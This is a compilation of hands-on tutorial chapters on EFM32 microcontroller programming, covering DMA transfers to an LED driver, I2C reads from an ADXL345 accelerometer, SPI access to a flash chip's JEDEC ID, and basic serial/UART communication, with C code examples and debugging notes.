Simplicity Studio emdrv directory. See the example in Github here for the required files that I have copied into the project src directory. The DMA peripheral can also be set up through use of the em_drv library. There are examples in Application Note AN0013 Direct Memory Access that configure things more manually. In short, the DMA peripheral looks for something called a descriptor table located in RAM that holds the configuration of the data transfer. This configures the DMA behavior, along with the configuration registers that reside inside the DMA peripheral. All of these things need to be configured, and then the DMA peripheral can do the transfer once its trigger event occurs. The descriptor table is used by the DMA peripheral at the trigger event to determine how to complete the transfer, including end addresses, address increment size, number of transfers, etc. When the transfer is complete, the DMA peripheral can be configured to issue an interrupt. There are four modes of operation of the DMA peripheral. DMADRV only simplifies the use of the Basic DMA mode, but does not do too much to help with the other advanced modes. That is good for this example, since we only need Basic DMA mode for transferring data from our array in RAM to the USART peripheral. To use the DMADRV, all we need to do is put a bit of code in the beginning of our main program to initialize the DMADRV and let it find an open DMA channel for us. This is great, because we don’t have to worry about using the same channel that SPIDRV or some other module is already using. // These variables are global, at the top of the file unsigned int dma_channel; // Transfer Flag volatile bool dma_in_progress; // The following code is in the main function Ecode_t result; // Initialize DMA. result = DMADRV_Init(); if (result != ECODE_EMDRV_DMADRV_OK) { DEBUG_BREAK } // Request a DMA channel. result = DMADRV_AllocateChannel( &dma_channel, NULL ); if (result != ECODE_EMDRV_DMADRV_OK) { DEBUG_BREAK } Now, we have a DMA channel that we can pass into the DMADRV functions. To make the transfer, we can replace the for loop that we used inside of the write_serial_stream function with the DMADRV_MemoryPeripheral function. First, we define the callback function that is called when the DMA transfer is complete: void dma_transfer_complete(unsigned int channel, bool primary, void *user) { // Clear flag to indicate that transfer is complete dma_in_progress = false; } Next, we have to change a few things inside of the write_serial_stream function to handle the DMA transfer. If you recall from the previous section, we incremented through the serial_stream array backwards in order to send the most significant byte first on the USART, as the TLC5940 expects to see the data. // Now write the stream, MSByte first for (int i=length-1; i>=0; i--) { USART_Tx(USART1, stream_buffer[i]); } But we can’t do that with DMA, as it can only iterate through memory in the forward direction. So we have to fill the serial_stream array backwards instead, and then the direction in which the DMA peripheral fetches the data from memory and pushes it to the USART will be in the correct order. // This must be global to be used for DMA uint8_t stream_buffer[MAX_STREAM_BIT_LEN/8]; void write_serial_stream() { int length; // Must pack the bits in backwards for DMA driver if (stream.mode == DOT_CORRECTION_MODE) { length = DC_STREAM_BIT_LEN / 8; for (int i=0; i < length; i++) { stream_buffer[length-i-1] = pack_dc_byte(i); } } else { length = MAX_STREAM_BIT_LEN/8; for (int i=0; i < length; i++) { stream_buffer[length-i-1] = pack_gs_byte(i); } } // Set/clear the VPRG pin if (stream.mode == DOT_CORRECTION_MODE) { GPIO_PinOutSet(CONTROL_PORT, VPRG_PIN); } else { GPIO_PinOutClear(CONTROL_PORT, VPRG_PIN); } dma_in_progress = true; // Start the DMA transfer. DMADRV_MemoryPeripheral( dma_channel, dmadrvPeripheralSignal_USART1_TXBL, (void*)&(USART1->TXDATA), stream_buffer, true, length, dmadrvDataSize1, (void *) dma_transfer_complete, NULL ); while (dma_in_progress) ; //EMU_EnterEM2(true); for (volatile int i=0; i < 10000; i++) ; // Latch the data GPIO_PinOutSet(CONTROL_PORT, XLAT_PIN); for (volatile int i=0; i < 100; i++) ; GPIO_PinOutClear(CONTROL_PORT, XLAT_PIN); } You can see that we replaced for loop that sent data to the USART within write_serial_stream with the DMADRV_MemoryPeripheral function, which means that the data is flowing from memory to a peripheral. There is a companion function that goes the other way. Before the DMA_MemoryPeripheral function, we set a flag for dma_in_progress, and then waited for it to clear before moving on. The flag clear takes place inside the dma_transfer_complete callback function when the DMA transfer completes. However, instead of waiting in a while loop for the DMA to finish, we could have let the MCU go work on something else or entered into a sleep state, as long as we take care ahead of time to configure the DMA interrupt to wake the MCU from sleep. You should notice that the serial_stream array was moved outside of the write_serial_stream function. It is super important that you make all variables that are referenced by DMA globally persistent. In our example, it makes no difference because we wait for the DMA transfer to finish, but as soon as we remove that blocking logic and allow the system to leave this function, the local variable serial_stream will be reclaimed by the system for other purposes and the data will become mangled. By making serial_stream global, it is preserved even after the write_serial_stream function exists, when the DMA transfer might still be in progress. This should have been an easy introduction to DMA transfers. We will revisit DMA in future chapters to set up more complicated modes and really try to melt your brain. This completes the chapter on interfacing with an external LED driver over a non-standard serial stream interface. By now, you should be well on your way to becoming a competent solderer and getting to know your way around the initialization of a few EFM32 peripherals. You should also feel like something of an expert in the types and applications of LEDs. Nov 08 2017, 9:02 PM This is part 2 of a four part series on using the I2C bus to interface an accelerometer. In part 1, we learned how to physically connect the accelerometer to the EFM32 Starter Kit board, and how an I2C bus operates. The background theory about how accelerometers work and their uses were also covered. In this section, we will learn how to configure the EFM32 for the I2C bus through the em_i2c driver library. We will illuminate an LED on the Starter Kit to indicate the successful reading of the Device ID register on the accelerometer. I2C Software Configuration Now you should have your Starter Kit and ADXL345 connected and ready to go. For this section, I chose to run the Simplicity Configurator tool to create all of the necessary HFXO, GPIO, USART (for serial port output later), and I2C peripheral initialization code for me. You can look at Lesson 8 on Serial Communication where that tool was first demonstrated. I went through the steps to select all of the peripherals that I wanted to use and the tool created this block of initialization code within the enter_DefaultMode_from_RESET function in the resulting InitDevice.c file, located in the src directory of the project that the Configurator created: // $[Library includes] #include "em_system.h" #include "em_emu.h" #include "em_cmu.h" #include "em_device.h" #include "em_chip.h" #include "em_gpio.h" #include "em_i2c.h" #include "em_usart.h" // [Library includes]$ //============================================================================== // enter_DefaultMode_from_RESET //============================================================================== extern void enter_DefaultMode_from_RESET(void) { // $[Config Calls] CMU_enter_DefaultMode_from_RESET(); HFXO_enter_DefaultMode_from_RESET(); LFXO_enter_DefaultMode_from_RESET(); USART0_enter_DefaultMode_from_RESET(); I2C0_enter_DefaultMode_from_RESET(); PORTIO_enter_DefaultMode_from_RESET(); // [Config Calls]$ } The tool also copied over the library files like em_i2c.c and the others that it includes at the top of the file. Within each of these functions, there is more initialization code. For example, the default I2C initialization code is here: //================================================================================ // I2C0_enter_DefaultMode_from_RESET //================================================================================ extern void I2C0_enter_DefaultMode_from_RESET(void) { // $[I2C0 initialization] I2C_Init_TypeDef init = I2C_INIT_DEFAULT; init.enable = 1; init.master = 1; init.freq = I2C_FREQ_STANDARD_MAX; init.clhr = i2cClockHLRStandard; I2C_Init(I2C0, &init); // [I2C0 initialization]$ } This code shows that I want it to be enabled, functioning as a master I2C device, running at the standard I2C max frequency. I wasn’t sure what the i2cClockHLRStandard enum was all about, so like always, I clicked on the name, then right-clicked and selected Open Declaration. That brought me to the header file which described all of the possible enums for this init.clhr member. I found a comment that said “Set to use 4:4 low/high duty cycle” for this enum. This has to do with how long to keep the clock high versus low during a single I2C bit time. I didn’t know any reason why I would want anything other than the default, so I left it alone. I then edited my main.c file to include my standard utilities.h helper file and called the setup function, which sets up the SysTick interrupt so that my delay function will work. I then included the call to the initialization function found in the InitDevices.c file. I also added the library header file for I2C which is em_i2c.h. Note that there are some older examples in the Simplicity Studio installation directory that are based on an older i2cspm.h library, which I am not using here. At this point, I had the following code: #include "em_device.h" #include "em_chip.h" #include "InitDevice.h" #include "em_i2c.h" #include "utilities.h" /**************************************************************************//** * @brief Main function *****************************************************************************/ int main(void) { CHIP_Init(); enter_DefaultMode_from_RESET(); setup_utilities(); // Code to interface I2C device goes here... // Infinite loop while (1) { } } Thanks to the Configurator tool and the previously-created utilities helper file, I only have to add two lines of code to get everything configured and ready to go. And, I won’t forget to enable the clock for any of the peripherals, like I always tend to do, since the Configurator took care of that for me. Read the Device ID The first thing that I do when working with a new part is to read the Device ID register. That is a good way to work out any issues with the libraries, connections, and conventions used in the device. In order to read a register on an I2C device, you have to first perform a write cycle to the offset of the register that you are targeting on the device, and then immediately perform a read cycle to fetch the value of that register. Confusing? It certainly can be. But fortunately, the em_i2c peripheral inside of the MCU and associated software library takes a lot of that work off of your hands by defining the following I2C transaction types: The first two types of I2C flags, I2C_FLAG_WRITE and I2C_FLAG_READ are used in situations where no register offsets are needed. The ADXL345 device has no use for these two types because there is no data that can be read or written without first specifying a register offset. However, the second two types of I2C flags, I2C_FLAG_WRITE_READ and I2C_FLAG_WRITE_WRITE are used to specify the register and memory offsets inside an I2C device. These types are illustrated here by what you see on the I2C bus if viewed on a logic analyzer or scope. Only an I2C master can start an I2C transaction, and it does so by setting the SDA signal low while SCL is high, which is called a START bit. This is the event that alerts all slaves on the bus to monitor the next seven bits to see if the forthcoming I2C transaction is directed at them. The master then transmits the 7 bits of address and indicates with the eighth bit if the data packet that follows is a read or a write. The ninth bit is driven only by the slave, which is the acknowledge bit, or simply ack bit. If the slave drives the SDA pin low for the ack bit, it tells the master that it recognized the address as its own and it is ready to read or write the data packet(s). If the slave fails to drive the ack bit low (which is a NACK condition) either it is not recognizing the address packet as its own address or it is not ready for the transaction. It is completely possible that there is no slave there at all. The ack bit is key. If the slave drives the ack bit low, you have proof of life. After the ack bit, one or more data packets of 8-bits in length each are transferred, each with an ack bit between them, and the whole I2C frame is then terminated with a STOP bit, which is sort of the inverse of the START bit (rising edge on SDA while SCL is high). The 7-bit device address packet in the beginning of a frame is reserved for the I2C device address on the I2C bus, and it is required at the beginning of every I2C transaction to select the slave that is targeted by the transaction. It is easy to forget that this address is the address of I2C device itself and not an offset into the device’s register or memory space. Then, the R/W bit in that first address packet indicates the direction that data is to flow in the next sequence of data packets that follow, either from master to slave (write) or slave to master (read). The tricky part is reading or writing a register or memory location on an I2C device, because it takes two I2C frames to make this happen. The first I2C frame contains the I2C address of the device, with the R/W bit set low, indicating that the next data packet(s) will be driven by master to slave. Those write data packets are either register offsets or memory locations that will be read or written by the master in the next I2C frame and can be a single byte or multiple bytes, depending on the I2C slave’s address space. Then, another START bit is sent (called a repeated start), and the I2C device address is once again sent, followed by the R/W bit. The R/W bit in the second I2C frame is what dictates whether or not the data packet(s) of the second I2C frame will be sent from master to slave or slave to master, i.e. a write or a read data packet. Why is all of this important? Well, as long as you write perfect code and always connect devices together perfectly, you would never have to worry about all of that interface minutiae. However, if you are human and make mistakes, you will need to break out the scope and figure out what went wrong. When I initially tried to read the Device ID register of the ADXL345, I ran into a few problems. I tried to run an I2C_FLAG_WRITE_READ cycle to fetch the Device ID and compare it to the value of 0xE5 as is published in the ADXL345 specification. I wrote the following functions to help me do that: #define ADXL345_ADDRESS 0x53 << 1 // This shift is important! #define DEVICE_ID 0xE5 #define CMD_ARRAY_SIZE 1 #define DATA_ARRAY_SIZE 10 // Globals for persistent storage uint8_t cmd_array[CMD_ARRAY_SIZE]; uint8_t data_array[DATA_ARRAY_SIZE]; // Used by the read_register and write_register functions // data_array is read data for WRITE_READ and tx2 data for WRITE_WRITE); } } // Read a config register on an I2C device // Tailored for the ADX345 device only i.e. 1 byte of TX uint8_t i2c_read_register(uint8_t reg_offset) { cmd_array[0] = reg_offset; i2c_transfer(ADXL345_ADDRESS, cmd_array, data_array, 1, 1, I2C_FLAG_WRITE_READ); return data_array[0]; } The i2c_transfer function is generic, and could be used for any kind of I2C device for any of the four types of I2C transactions. I then created the i2c_read_register function tailored to the ADXL345 slave to make it easier to read a single-byte value of a register on this device. Once those functions were there, I called them at the bottom of my main function: delay(100); I2C_Init_TypeDef i2cInit = I2C_INIT_DEFAULT; I2C_Init(I2C0, &i2cInit); // Offset zero is Device ID uint16_t value = i2c_read_register(0); // Set an LED on the Starter Kit if success if (value == DEVICE_ID) { set_led(1,1); } // Infinite loop while (1) {} It didn’t work. The I2C cycle never finished and was stuck in the while (result != i2cTransferDone) loop. I found the following waveform on the scope: Channel 1 (orange) is SCL and channel 2 (blue) is SDA. This didn’t look like anything I was expecting. There should be two 8-bit pulses for a read cycle. After some single-stepping in Simplicity Studio, I saw that routing of I2C peripheral to GPIO pins caused a glitch on the I2C bus that looked like a START signal to the ADXL345. The order in which the Simplicity Configurator had configured my I2C pins in the InitDevice.c file was backwards. It was configuring the GPIO output and then routing the I2C peripheral to the GPIO pins. The problem with the Configurator will probably already been corrected by the time you read this. Stuff like this happens, and you have to question everything. So I reordered the calls so that the routing happens first and the configuration of the GPIO pins happens last, and the glitch disappeared. // NOTE: These cannot come before I2C ROUTE operations or a glitch will appear! // // /*]$ // $[Port E Configuration] /* Pin PE10 is configured to Push-pull */ GPIO->P[4].MODEH = (GPIO->P[4].MODEH & ~_GPIO_P_MODEH_MODE10_MASK) | GPIO_P_MODEH_MODE10_PUSHPULL; /* Pin PE11 is configured to Input enabled */ GPIO->P[4].MODEH = (GPIO->P[4].MODEH & ~_GPIO_P_MODEH_MODE11_MASK) | GPIO_P_MODEH_MODE11_INPUT; // [Port E Configuration]$ // $[Port F Configuration] // [Port F Configuration]$ // $[Route Configuration] /* Module I2C0 is configured to location 1 */ I2C0->ROUTE = (I2C0->ROUTE & ~_I2C_ROUTE_LOCATION_MASK) | I2C_ROUTE_LOCATION_LOC1; /* Enable signals SCL, SDA */ I2C0->ROUTE |= I2C_ROUTE_SCLPEN | I2C_ROUTE_SDAPEN; /* Module PCNT0 is configured to location 1 */ PCNT0->ROUTE = (PCNT0->ROUTE & ~_PCNT_ROUTE_LOCATION_MASK) | PCNT_ROUTE_LOCATION_LOC1; /* Enable signals RX, TX */ USART0->ROUTE |= USART_ROUTE_RXPEN | USART_ROUTE_TXPEN; // [Route Configuration]$ // Relocated from above... /*]$ After I fixed that problem, in that I was now seeing two 8-bit cycles but the device ID still wasn't correct. I hate it when that happens, and it happens all the time. You fix a real bug, only to still be facing the same exact problem. I examined the now healthier-looking waveform on the scope and noticed that the I2C device address was shifted over by one bit. The ADXL345 breakout board has an I2C address of 0x53. I had sent in this address to the em_i2c library routines exactly like that. But the I2C address is only seven bits wide and the em_i2c library expects those seven bits to be left justified, so that the zero-th bit is a “don’t care.” This was clearly documented in the em_i2c library header file but I missed it: /** * @brief * Address to use after (repeated) start. * @details * Layout details, A = address bit, X = don't care bit (set to 0): * @li 7 bit address - use format AAAA AAAX. * @li 10 bit address - use format XXXX XAAX AAAA AAAA */ uint16_t addr; So once I did a left shift on the I2C device address (which I have already fixed in the example code above) with the statement show here, the Device ID was successfully returned back to me and the light lit on the Starter Kit. #define ADXL345_ADDRESS 0x53 << 1 This is what an I2C read register is supposed to look like. The first 8-bit cycle is the write of the address from the MCU to the device, and the second 8-bit cycle is the read data returning from the device. Now if you can get that little test LED to light up on your Starter Kit and ADXL345 breakout board, you are finally ready to start doing fun things with your accelerometer! We will start experimenting with the accelerometer measurements in the next post. In this chapter, we will learn how to use the I2C bus to configure and read the live acceleration data from an accelerometer. We will connect the circuit to your Starter Kit, create interface code, and then output the measurement data over a serial port to your computer in real time. We will then create an interrupt routine to detect a “freefall” event to trigger an LED on the Starter Kit. This chapter aims to first teach how to connect to an I2C device with the help of the EFM32 I2C library. I2C is a commonly utilized communication interface for embedded designs. Thanks to only requiring two pins on the MCU, plus the fact that many devices can connect over those two pins makes it very versatile. In order to give us an interesting I2C device to talk to on the other end of that bus, I chose an accelerometer. An accelerometer is a device that can measure acceleration on one or more axes. It can be used to detect the orientation of your device relative to the earth’s gravity. This can be useful for tilt sensors, to tell your object if it is right-side up, or upside-down. But they can also measure acceleration due to movement, which would be good know if your device needs to know how it is moving through space. And it doesn’t just tell you that it is moving, but how much it is accelerating, and in which direction even if that means that there is no acceleration on your device at all, as in a free fall situation. That information could be helpful if your device is delicate needs to prepare itself for a hard landing! Accelerometers are a relatively new invention available to electronics developers. Long ago, an accelerometer was a large mechanical device that contained springs and plates. They were heavy, large, and expensive. That has changed for two reasons 1) Miniaturization of the mechanical parts of an accelerometer has shrunk it down to fit on a single surface-mounted chip and 2) they are employed in smart phones the world over, which drives down the cost for the rest of us. Materials Needed for This Lesson Accelerometer Theory Modern accelerometers are Micro Electro-Mechanical Systems (MEMS) devices, which means that they are able to fit on a small chip inside the smallest of gadgets. One method to measure acceleration employed by MEMS accelerometers is to utilize a tiny conductive mass suspended on springs. The acceleration of the device causes the springs to stretch or contract, and the deflection of the conductive mass can be measured through a change in capacitance to nearby, fixed plates. Accelerometers are specified by the following features: Axes of the ADXL345 Accelerometer The ADXL345 accelerometer used in this lesson is a digital output accelerometer that has three axes and a selectable g-range of 2/4/8/16 g’s. It connects to the MCU using an I2C or SPI interface. Note that we are going to demonstrate the I2C bus for this lesson, but I2C limits the measurement frequency to 800Hz whereas SPI allows a higher frequency of 1600Hz. Keep that in mind if your application requires the higher frequency. Connect the Accelerometer to the Starter Kit via I2C. More information can be found about I2C by viewing the official specification here. Sparkfun has a good tutorial here, and there’s another good tutorial from Robot Electronics here. Your ADXL345 breakout board is shipped without header pins attached. You have to solder them to the board as was demonstrated in Lesson 4, where we did the same thing to our Starter Kit. In order to connect the accelerometer to the Starter Kit via the I2C bus, I had to figure out which pins were available on the Starter Kit that were connected to an I2C peripheral inside the Wonder Gecko MCU. I started with the Datasheet for the Wonder Gecko, which I found in the tile view in the Simplicity Studio home page. I then looked to section 4.2 Alternate Functionality Pinout and found the available I2C interfaces and locations where those interfaces routed to GPIO pins. I found that the location 0 on I2C0 was not available on the Starter Kit, but the second one was available. I connected PD7 to the SCL pin on the ADXL345 breakout board and connected PD6 to the SDA pin on the breakout board. I then connected 3V3 on the Starter Kit to the VIN pin on the ADXL345 breakout board. I then placed a wire between GND pins on each board. NOTE: The 3V3 pin on the ADXL345 breakout board is an output pin to power other devices, not an input pin for the board. The input pin is labeled as VIN. Note that you could have built your own breakout board if you wanted to use an I2C device that had no breakout board or evaluation board available. Follow the instructions in Lesson 9, where a flash chip was given a breakout board with the help of a blank Schmartboard breakout board. In the next section, we will cover software configuration of the I2C interface on the MCU for the ADXL345 accelerometer. This is a five part series on the SPI communication protocol. In the first section, we learned all about SPI and how to make a SPI flash breakout board from a bare chip. In this section, we will connect the SPI flash to the EFM32 Starter Kit and then write some code with the help of the USART library to fetch the JEDEC ID from the register on the part. We will continue to rely on the Spansion flash chip’s spec to accomplish this. Flash Chip to MCU Connections The SPI bus requires either three or four wires, depending on the mode. I will demonstrate the use of SPI using the four-wire mode, which is more common in my experience than the three-wire mode. The EFM32 USART supports the three-wire mode and calls this mode Synchronous Half Duplex Communication. In that case, the MISO line is not used and the MOSI line becomes a bidirectional signal. You can read more about it in the Reference Manual. In SPI terminology, a SPI device can be a master or a slave device, at any given moment in time. The USART peripheral in the EFM32 can be configured as either one. One device has to be the master and the other a slave for a single SPI transaction. We will configure the MCU as master since the MCU is driving the interaction with the flash chip. We might someday configure the MCU as a slave if we have another MCU in a system and intend to share information between the two of them. But we could configure our USART in the MCU dynamically to be a slave on one cycle, then a master on the next cycle. The Master In Slave Out (MOSI) terminology is an improvement over the RX/TX nomenclature of the serial port connections. Now, a master device’s MOSI output pin connects directly to a slave’s MOSI input pin, and MISO pin to MISO pin. This is great, because the connections are made between like-named, or at least similarly-named pins. Unfortunately the Data Sheet tables for the USART pins don’t specifically list MOSI/MISO, and you still need to know to map the USART TX pins to MOSI and the USART RX pins to MISO. This information is covered in the Reference Manual for the USART peripheral. In addition, some devices don’t use the MOSI/MISO naming and instead use SDI, DI, SI, etc. for an input. If you can find the one that says input, attach that to the master’s MOSI and you will do fine. The flash chip breakout board has additional signals that must be attached to your Starter Kit. The first thing to look for are the power and ground connections. Whenever you are connecting your MCU to an external device, you need to take a look at the voltage requirements in the spec for that device. This is listed in the Electrical section for the Spansion chip. The Supply Voltage (also known as Vcc and sometimes called Vdd) requires between 2.7V and 3.8V. Sometimes you will find chips that require 1.8V or 2.8V, which would then need an external power supply to be provided. In this case, the chip can be powered directly from the Starter Kit’s 3.3V supply pins that are labeled as 3V3. Connect the signals as shown in the table below. We are using specific pins of USART1 location 1 for the SPI signals, since those are brought out to pins on the Starter Kit, and just any old GPIO’s for the other signals. Signal Spansion Flash Breakout Pin Wonder Gecko GPIO Pin CS# (Chip Select, active low) 1 – top left PD3 – USART CS SO (MISO) 2 PD1 – USART RX (MISO) WP# (Write Protect, active low) 3 PD4 – Chosen at random GND 4 – bottom left SI/SO (MOSI) 5 – bottom right PD0 – USART TX (MOSI) SCK (Clock) 6 PD2 – USART CLK HOLD# (active low) 7 PD5 – Chosen at random VCC 8 – top right V3V SPI Software Configuration Now that everything is wired up, it is time to communicate with the flash memory chip from the MCU with software. You can use Simplicity Configurator to configure the part like we did in the last lesson, or manually configure your USART to connect to the SPI signals CLK, CS, MOSI (TX in the USART) and MISO (RX in the USART). I will demonstrate how to do it manually for this chapter. There is a decision to be made about the clock mode when configuring the clock signal in the USART software setup. With SPI, very little is set in stone. It is up to the chip designers to determine exactly how the electrical signals should operate. The USART provides configuration registers that handle the polarity and phase in order to work with all devices. These are referred to as CPOL or CLKPOL (depending on the chip) for the clock polarity and CPHA or CLKPHA for the clock phase. The clock polarity can be set to either 0 or 1, which determines the idle state of the clock line. The clock phase can also be 0 or 1, which determines whether data is latched on the rising or falling edge of the clock signal. This gives four possible choices for clock modes 0 through 3, which make up the four clock modes. There are diagrams in the Reference Manual that describe all four modes. All that really matters to us at this point is that we pick the right mode for the Spansion chip. If we look in the spec for the Spansion flash chip, we see that it can operate in either clock mode 0 or clock mode 3. When configuring the CS line, there is a decision to be made about whether or not the USART peripheral will control the CS line automatically, known as AUTOCS, or if the software will explicitly control the CS line to the slave SPI device. We will need to control the CS line explicitly, because if we were to pick AUTOCS mode and fail to feed the USART the two bytes of data fast enough, the USART-controlled CS line will go high in the middle of the above waveform, and the device will essentially forget all about the command we requested. We need to drive the CS line low for the entire time as shown in the diagram. The AUTOCS mode is better used when we are sending bytes to the USART through another hardware mechanism rather than software. We will leave the SPI bus frequency at the default of 1MHz. The table in the Spansion spec states that the chip supports SPI bus frequencies up to at least 44MHz, but you should be aware that the maximum that the EFM32 chip can reach is about one half of the HFPER clock frequency. With the default HFRCO clock setup, that means it can only reach about 7MHz. Plus, our breadboard setup is more likely to see noise that could cause glitches at higher frequencies. void usart_setup() { // Set up the necessary peripheral clocks CMU_ClockEnable(cmuClock_GPIO, true); CMU_ClockEnable(cmuClock_USART1, true); // Enable the GPIO pins for the USART, starting with CS // This is to avoid clocking the flash chip when we set CLK high GPIO_PinModeSet(gpioPortD, 3, gpioModePushPull, 1); // CS GPIO_PinModeSet(gpioPortD, 0, gpioModePushPull, 0); // MOSI GPIO_PinModeSet(gpioPortD, 1, gpioModeInput, 0); // MISO GPIO_PinModeSet(gpioPortD, 2, gpioModePushPull, 1); // CLK // Enable the GPIO pins for the misc signals, leave pulled high GPIO_PinModeSet(gpioPortD, 4, gpioModePushPull, 1); // WP# GPIO_PinModeSet(gpioPortD, 5, gpioModePushPull, 1); // HOLD# // Initialize and enable the USART USART_InitSync_TypeDef init = USART_INITSYNC_DEFAULT; init.clockMode = usartClockMode3; init.msbf = true; USART_InitSync(USART1, &init); // Connect the USART signals to the GPIO peripheral USART1->ROUTE = USART_ROUTE_RXPEN | USART_ROUTE_TXPEN | USART_ROUTE_CLKPEN | USART_ROUTE_LOCATION_LOC1; } All of that work and we still don’t have anything that we can test to see if we did it right. We still need some code to actually initiate a SPI cycle and we need to find a destination for that cycle that will yield a meaningful result to prove that the SPI command worked or not. For this purpose, I turn to identification registers. The chip designers of SPI parts will usually give you a softball register that always returns a non-zero fixed value to let you test basic connectivity and signs of life. In this case, that register in the Spansion SPI Flash is the JEDEC ID at address 0x9F. It actually has three distinct, non-zero fixed values that it can return one after another. So we can test to make sure that we find the first value, then expand our test case to make sure that we find all three values. #include "utilities.h" // Re-used from earlier lesson for delay function #define JEDEC_ID_CMD 0x9F int main(void) { CHIP_Init(); usart_setup(); setup_utilities(); delay(100); uint8_t result[3]; uint8_t index = 0; GPIO_PinModeSet(gpioPortD, 3, gpioModePushPull, 0); // Send the command, discard the first response USART_SpiTransfer(USART1, JEDEC_ID_CMD); // Now send garbage, but keep the results result[index++] = USART_SpiTransfer(USART1, 0); result[index++] = USART_SpiTransfer(USART1, 0); result[index++] = USART_SpiTransfer(USART1, 0); GPIO_PinModeSet(gpioPortD, 3, gpioModePushPull, 1); // Check the result for what is expected from the Spansion spec if (result[0] != 1 || result[1] != 0x40 || result[2] != 0x13) { DEBUG_BREAK } while (1) ; } Execute the code shown and break in on the while loop. You should see a value of 1 in the result array at the 0 position. This proves to a 1/254 chance that we are reading the register that we think we are reading. Had this register’s default been zero or 0xff, we could not be sure that we were reading the right register because 0xff is the default state of flash memory at reset and zero is the usual default state for most configuration registers. But since the default value for this Manufacturer ID is 1, we can be confident that this SPI driver is beginning to work. You should notice something funny going on in this code. We read a single value from the USART_SpiTransfer function and don’t do anything with the return value, then we read another value before storing the return value. That is because a four-wire SPI bus is ALWAYS bidirectional. When a master drives a cycle out on MOSI, the slave is required to drive something on MISO for every clock edge, even on the first clock. But since the slave doesn’t even know what is being asked until after that first clock, the slave device will either send back a useless value, or sometimes slave devices will use this first bit time as a chance to send back a status message. You have to examine the SPI chip’s spec to find out what it will do. Once the command from the first bit time is latched and processed by the slave, it can respond with the necessary information on the second SPI transfer. The code verifies that all three values from the JEDEC ID command are as expected, which gives us near certainty that we have indeed read from the Flash SPI device properly and the USART driver is working well so far. In the next section, we will take a look at these SPI waveforms on the oscilloscopes and learn about more advanced SPI topology. PREVIOUS I NEXT In this chapter, we will open our embedded board up to exchange information with the outside world. Up until now, the only link that we have used is the built-in USB programming interface on the Wonder Gecko Starter Kit and some GPIO lines for controlling a few discrete components. Now we will share data across a communication protocol. Our EFM32 has quite a few built-in communication standards. It is quite the Swiss army knife. We will begin learning about the simplest of these interfaces in this chapter before learning about more in upcoming chapters. You can use these communication protocols to enrich your project by connecting multiple smart devices together and share information. The IoT is all about connected devices, and this is where it begins. First, we will cover the basics of serial communication protocols, terminal emulator programs, UARTs, USARTs, and serial cables. Then we configure the chip for USART communication using the Simplicity Studio Configurator tool, that takes care to make all of the connections and communication settings for the USART, through the GPIO block and to the outside world. We will build an interrupt handler to let us know when there is data received on the serial interface and see what signals look like on an oscilloscope, to make sure that things are really toggling like we expect. Finally, we will construct a print function so that we can use this newly acquired connection to aid in our debugging process. Communication Classes Communication is achieved between devices via three classes of communication methods: The parallel communication method is generally the fastest class. In a future lesson, you will learn about parallel communication in order to transfer large amounts of data quickly to graphical displays. When your peripheral is on the same PCB board as the MCU, a parallel interface makes a lot of sense if fast speeds are needed and pins are available. But when your embedded system needs to communicate with other external devices, all of those conductors create complicated connectors and bulky, expensive cabling. In the early days of the PC, all computers had a parallel port that allowed transferring large amounts of data form the PC to a peripheral, normally a printer. The cables were never cheap or light.. A serial communication method forces the transmitted data to march in a single-file line, as all of the data flows bit-by-bit one after another. This is generally a slower form of communication but requires fewer wires between devices. This type of communication can be transmitted in a synchronous mode, which means that there is a clock line to coordinate the bits at the other end, or without a clock, which is an asynchronous mode. I will be using and explaining asynchronous mode in this lesson. The large majority of your embedded system operates in a synchronous mode. Nothing ever happens if the clock doesn’t toggle. Therefore, the devices that utilize asynchronous signals must be able to bridge the gap between clocked and clock-less domains. This presents some challenges in finding proper clock sources. The standard that is most often used for asynchronous serial communication is the RS-232 standard, which is based upon the UART communication protocol. More on this later. This standard describes how devices asynchronously communicate information, including the voltages and optional flow control siganals. It is not required to make use of this particular standard, but it is most common and the one that we will be using for this lesson. However, just because there is a standard doesn’t mean that all systems will work well together. The standard doesn’t specify how software should deal with the data that is transferred. In addition, the RS-232 interface specifies a +5V and -5V as part of the electrical signaling and we will not be implementing that part, as both the EFM32 MCU and the USB-to-serial port adapter don’t use these voltages, but instead use 3.3V and 0V as the logic 1 and logic 0 values. RS-232 also adds optional flow control signals such as the Request To Send (RTS), Clear To Send (CTS), to manage the bidirectional transmission of data between two systems, usually modems, and we don’t need all of that extra signals. So what I am referring to as RS-232 here is really just the packet format and not much more. This happens a lot in technology. It’s hard to keep track of all of the nuances between different specs and even different versions of specs. The people who make the components get confused at times too. That’s why it’s so hard to get things to work together sometimes! Serial Interfaces and Terminal Emulator Programs In 80’s and 90’s, all computers shipped with a serial port that had a ridiculously large DB9 connector, by today’s standards, and implemented the full RS-232 standard. Sometimes it was necessary to enter into the computer’s BIOS setup utility and turn them on, or assign them to a different address range or IRQ lines to not conflict with your groovy new drawing pad or speech synthesizer. Those were the days. Today, you will most likely need a USB-to-serial adapter to access this old interface. You can use a breadboard-friendly CP2104-MINIEK breakout board for this task. The drivers are available on the Silicon Labs website so that your computer will detect this breakout board. USB has supplanted RS-232 to be used for most peripheral needs, and wireless links are replacing those. But, the lowly serial port is still used wherever a design calls for a cheap and easy way to get some rudimentary console-based access to a host system. Embedded designers routinely choose serial ports for diagnostics and debug of heavyweight computers that otherwise have multi-GB interfaces. When those beasts fail to boot up properly, the serial port can be the salvation to figure out what went wrong. Often, the data that is transmitted via an serial interface is ASCII text for human consumption or as commands to be sent to a device. ASCII stands for American Standard Code for Information Interchange and is the binary code behind all of the text that makes up the alphabet, punctuation characters, and other miscellaneous characters. But it is also possible to transfer information data over a serial interface in a pure binary format in order to program a part with new machine instructions, for example. To interface with the serial port on your computer, you will need to find a suitable terminal emulator program. A computer terminal was widely used in the days before PC’s as the primary human interface to mainframe computers. It had a keyboard, a display screen and just enough smarts to send and receive RS-232 data. Today, since our computers are so much more capable than just displaying text and accepting keystrokes, you can download a program that emulates a terminal in a window on your computer. This terminal will be the portal in which you will communicate with your embedded device. Windows users of any recent installation need to turn to external software to be able to access the serial port. Putty and TeraTerm are two of my favorite free terminal emulators. Download and install one of those now. Note that Linux and Mac computers have a built-in terminal and a built-in serial port device at /dev/ttyX, in which X is the identifier of the serial port. Serial input and output can be routed to the built-in terminal with just a simple command like: screen /dev/ttyUSB0 115200 where ttyUSB0 is wherever your USB-to-serial port adapter is located, and 115200 is the baud rate, described below. Configure the following parameters in your chosen terminal emulator: The most customary settings going back decades for all of these settings is known 9600 8N1. This means 9600 baud, 8 data bits, no parity, and 1 stop bit. I will actually be using a faster baud of 115200, which is a more modern standard speed. In 